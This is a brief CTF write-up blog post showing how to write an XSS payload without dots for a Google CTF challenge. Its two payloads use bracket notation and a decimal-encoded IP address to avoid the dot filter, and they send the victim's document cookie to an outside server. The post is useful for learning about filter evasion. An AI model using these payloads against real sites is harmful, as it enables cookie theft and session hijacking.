Browsed by
Category: CTFs

XSS without Dots, Periods or Full Stops

XSS without Dots, Periods or Full Stops

I had to use it for GoogleCTF’s Wallaby Web 3 Challenge. My solution: <img src=x onerror=window[‘location’]=”http:///3221226219/?q=”+document[‘cookie’]> Where 3221226219 is the decimal representation of the IP address of the server we used. Inside <script> tags one can use this[‘window’][‘location’] and this[‘document’][‘cookie’] Kris’s solution was to use <script>this[‘window’][‘location’]=’http://3221226219/?q=’+this[‘document’][‘cookie’]</script>